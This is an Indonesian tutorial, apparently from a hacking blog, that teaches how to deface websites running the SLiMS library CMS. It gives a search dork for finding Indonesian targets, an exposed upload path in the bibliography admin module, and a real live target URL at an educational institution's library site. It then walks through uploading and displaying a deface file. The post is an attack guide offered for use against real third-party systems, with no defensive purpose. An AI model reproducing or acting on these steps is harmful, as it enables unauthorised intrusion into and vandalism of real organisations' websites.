CARA DEFACE CMS SLIMS + LIVE TARGET

 

Halo teman², kali ini kita belajar DEFACE POC CMS SLIMS, ike seperti biasa udah di siapin live target dong:D
Langsung saja ke tutorialnya:D

BAHAN BAHAN:

-SC DEFACE EXTENSI TXT
-DORK: powered by SLiMS site:id
-EXPLOIT: /admin/modules/bibliography/pop_attach.php

Live target: https://library.institutpendidikan.ac.id/admin/modules/bibliography/pop_attach.php


LANGSUNG SAJA KE LANGKAH PERTAMA

1.KALIAN DORKING DULU SEPERTI BIASA

2.PILIH TARGET YANG KALIAN INGINKAN

3.JIKA SUDAH MENEMUKAN TARGET TINGGAL KASIH EXPLOITNYA
CONTOH: site.com/admin/modules/bibliography/pop_attach.php

4.JIKA WEB ITU VULN MAKA ADA TEMPAT UPLOADNYA

5.ISI FORMULIRNYA NGASAL GUYS TEROS UPLOAD SC DEFACE TXT KALEAN OKE

6.NAH BERHASIL TINGGAL PANGGIL SC DEPES KITA



CARANYA?

site.com/[PATH]/repository/script lu.txt
site.com/repository/script lu.txt


Oke semoga bermanfaat see u:)
أحدث أقدم